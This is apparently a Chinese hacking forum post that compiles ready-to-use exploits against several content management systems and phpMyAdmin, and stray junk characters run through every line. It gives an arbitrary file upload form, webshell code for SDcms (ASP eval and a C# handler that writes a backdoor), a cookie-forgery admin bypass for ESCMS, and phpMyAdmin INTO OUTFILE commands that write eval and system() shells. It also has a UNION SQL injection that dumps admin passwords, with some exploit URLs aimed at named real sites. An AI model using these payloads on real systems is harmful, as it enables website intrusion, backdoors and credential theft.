跳转到网站根目录上传任意文件。5 Z; z# |8 d0 W% V2 u
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
: y* D" M$ e- H( ~ i( G* _<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
- y+ t1 k4 D, w' X( cUpload a new file:<br>
1 v6 ~4 {- b4 [( q5 K ^2 x3 h/ z<input type="file" name="NewFile" size="50"><br>
5 v' m R+ m1 n. j" b8 Y9 j<input id="btnUpload" type="submit" value="Upload">
2 E; v( V S: U7 Q0 X</form>2 V6 ?1 Y. z& l/ A; d
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) ^ q8 u- }: p: I! Z1 M1 V0 g+ i
+ m& l! ]7 E% M: F0 F! l2 WSDcms 后台拿webshell
& R- w1 F2 a0 _ R
- B+ Y/ I4 q4 j+ z' x2 L第一种方法:
% z. j5 i2 S1 R6 { X0 p* s5 s进入后台-->系统管理-->系统设置-->系统设置->网站名称;
2 b( T. \+ G% m. h- S把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
% K$ \) t3 h2 t6 K5 J; ^, N k用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。/ o, H' |, l: V/ R" o
第二种方法:
b; L6 L" {5 `2 b, W7 q进入后台-->系统管理-->系统设置-->系统设置->上传设置;; S$ J7 w/ @' b3 b" L4 l) \0 w
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
5 {/ J6 T( @$ _第三种方法:
2 w) q% X1 A# ^# j T; a进入后台-->界面管理-->模板文件管理-->创建文件
9 ?; \ h# s- O/ [/ ]文件名写入getshell.ashx
% F0 _5 ]6 h$ s9 D1 T内容写入下面内容:
- w& d! U0 A9 D) i! T2 f2 @. ~/====================复制下面的=========================/
9 O7 Z' r* o8 R! h" j<%@ WebHandler Language="C#" Class="Handler" %>
/ Y9 _3 x. \" w* r! M& b- K& `using System;
: _5 Z6 Z) c3 M/ w) q# @using System.Web;$ G6 s" D2 T3 H# S6 b* I
using System.IO;
- J' A- @1 s0 U- g! Y8 npublic class Handler : IHttpHandler {2 a" D4 G+ P& |* ]0 j
public void ProcessRequest (HttpContext context) {, ?1 ]* @) ]4 I6 k
context.Response.ContentType = "text/plain";
+ L: N9 x: J! S2 _5 ^& f- yStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
, u2 S* C/ v, h* q% g* gfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
' }7 U' Q9 Z% L. y- h8 Q" F' k; H1 hfile1.Flush();
) h7 Y% v% \: \3 afile1.Close();+ m7 ^' D, O) _) e! n
}
; l) Y3 z9 }1 z7 f( Rpublic bool IsReusable {
; A: N( k" V9 |( K6 Pget {- }% T6 S2 q+ j& ]; W( k: g- P
return false;( ~. |6 J3 L9 G) f3 Z/ D
}# u' s: V! Q3 C/ t8 E
}
5 d9 T0 [& s# B/ o7 e3 C}
. U( O( d6 r1 F" V4 {1 p* k/=============================================/
6 J, Z. \" d1 j访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
3 @3 h" U4 i' }+ c' z会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接+ D0 D" e0 G* D2 F$ v
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------% N& d" z, x9 ^; n6 }5 b/ x4 w
7 }; k* S+ O+ G# k8 I; DESCMS网站管理系统0day
, |7 B4 J+ Z( y( D" {3 U" ?# B& m
- u. M! [! |* z9 u后台登陆验证是通过admin/check.asp实现的
9 _/ O0 U- O7 K. r1 T' \& I3 Q7 F5 R8 O8 p0 s: }9 ?% l
首先我们打开http://target.com/admin/es_index.html
( r- S; A5 e$ m然后在COOKIE结尾加上
5 P6 X9 j( h7 L: j- i A7 r; ESCMS$_SP2=ES_admin=st0p;; i5 f- D/ Z! E0 I! C3 I4 q" z
修改,然后刷新8 [ Y* u: h% Q5 h% _* m
进后台了嘎.., g4 [ m, ~7 r" v$ a. r
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
3 p3 m. e2 F4 E* S8 y a5 s! s+ d1 t9 E' v9 R
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
" N5 b: o( R) ~! ]+ A4 @6 W嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp2 J; ~5 _. h' X+ S2 ]
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
: q) A+ w D" H2 `) A! V6 n在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了' k, c! \: l" A. x: I8 L4 J
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ R8 ^3 ^# j9 q& a( G- Q) g6 a" v6 p
J o) s5 \* ^5 p; M6 M% {; R* P宁志网站管理系统后台无验证漏洞及修复0 }# K7 g! X* G7 a0 U8 `! J) C& e
6 ?# f( C- y) X8 z# m网上搜了一下,好像没有发布.如有雷同纯粹巧合!4 o* q! X N; q; h8 @+ {5 g
官方网站:www.ningzhi.net0 M6 t' s" O. T' l% P
学校网站管理系统 V.2011版本
( D, a0 x' D3 d5 c! {# |http://down.chinaz.com/soft/29943.htm & A; t- U" ?6 R$ U% _+ d' f1 }
其它版本(如:政府版等),自行下载.
0 O% _/ a7 D, G2 b* V漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
7 K4 M: N4 _5 X$ Alogin.asp代码如下:
1 I4 | T N/ ?$ e<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
. D& V$ p1 B* F, N/ gmanage.asp代码我就不帖出来了.反正也没验证.4 a# y/ `) K: L4 H) d
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!7 J1 B" T! A! m B( G) ^
漏洞利用:$ l+ c0 h- d1 \6 R4 M, s
直接访问http://www.0855.tv/admin/manage.asp
; _! s% M# M+ ?7 q8 E. o. j- l+ s数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
Z( \9 m" H5 d* m----------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ q% Q8 k8 o- }+ n7 a1 W0 |/ D
9 U, P& f8 |/ b* ?# X# w! H
phpmyadmin拿shell的四种方法总结及修复- H1 I6 Y( r% e1 b" m: T3 O
8 b8 q e, I3 z' Q
方法一:
, w) {$ W6 E- d' C: F5 GCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
- \. C/ O" B3 b: f2 S/ VINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');! p; Q# L3 |5 J$ J$ o2 o! [' K8 a
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
& B) M' L& G2 ~( k3 s----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php& A" K4 X- v4 H% b) s; _- ^3 }
一句话连接密码:7on
( J2 |0 d# ?. e9 D# s! D4 h/ X方法二:
- A1 b, A: z$ x读取文件内容: select load_file('E:/xamp/www/s.php');
+ v7 M: l' q/ j* ?6 h7 m写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'" R; b7 H$ B6 a/ o4 ]
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
5 g8 t3 N- D/ H; J0 m2 C# j方法三:
5 }9 n7 }( {) ?# Z8 }$ i8 `JhackJ版本 PHPmyadmin拿shell
1 \) ~/ K+ C0 b8 `' F4 a0 }8 ZCreate TABLE study (cmd text NOT NULL);
* K# c* V( c; H, L3 FInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
8 V* y& B% V% T- ^+ \( q2 }select cmd from study into outfile 'E:/wamp/www/7.php';
$ N r% v& L; V# A$ ?/ oDrop TABLE IF EXISTS study;: M0 g4 s8 z+ s
<?php eval($_POST[cmd])?>9 p7 K. ]; s1 k8 o0 M
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。. g; M' I2 c. _' j# f. @6 V
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1( @) c4 e; M5 T3 h# L
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1- F6 E3 r3 e9 b6 J
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
( R/ n4 a% q' S ^5 Z方法四:6 ?, P; b$ P0 Y9 H m
select load_file('E:/xamp/www/study.php');
/ g& t( p5 p% N# A9 Xselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
' E/ P0 i$ I! w# H* x( @然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
+ O1 t! ^! \1 m. u-----------------------------------------------------------------------------------------------------------------------------------------------------------------------4 ^. z6 F3 u3 B7 B' ]* i, A1 s
! W- @( c. E. C; B$ oNO.001中学网站管理系统 Build 110628 注入漏洞+ K7 r( F, }: y5 S$ l0 b
% }4 h4 p: E+ p( Z& MNO.001中学网站管理系统功能模块:! w- t0 K, Y+ h
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等6 A" E- f0 ^9 x8 Z. G7 h, T
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息& [9 t4 k) f' D2 A+ }/ b7 I
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息! _. X' Q) K* z& A8 ^$ Z& ?- \
4.视频图片管理:一级分类,动态添加视频或者图片等信息/ u7 C% s: O! M+ r, M
5.留言管理:对留言,修改,删除、回复等管理: r: E* G+ Q) I) M) \
6.校友频道:包括校友资料excel导出、管理等功能
, b, s P. i# n( W! w, K R7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
$ k* l* {) `+ J3 u默认后台:admin/login.asp
$ F, r; @% y% B1 c# |4 r' {官方演示:http://demo.001cms.net5 }$ i! ?3 v4 u
源码下载地址:http://down.chinaz.com/soft/30187.htm
; m* ^6 m$ h/ x5 e, ]EXP:
( i1 S2 }) ^! ?. W% Y- Nunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
y% k) S# T' p; _( Z- L测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
. ?6 `) w' G6 s; Z5 R, R4 H, P- ngetshell:后台有备份,你懂的! _7 O4 I# H, Z- F9 t. r
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
$ ^8 y, G" w5 C3 P2 v------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对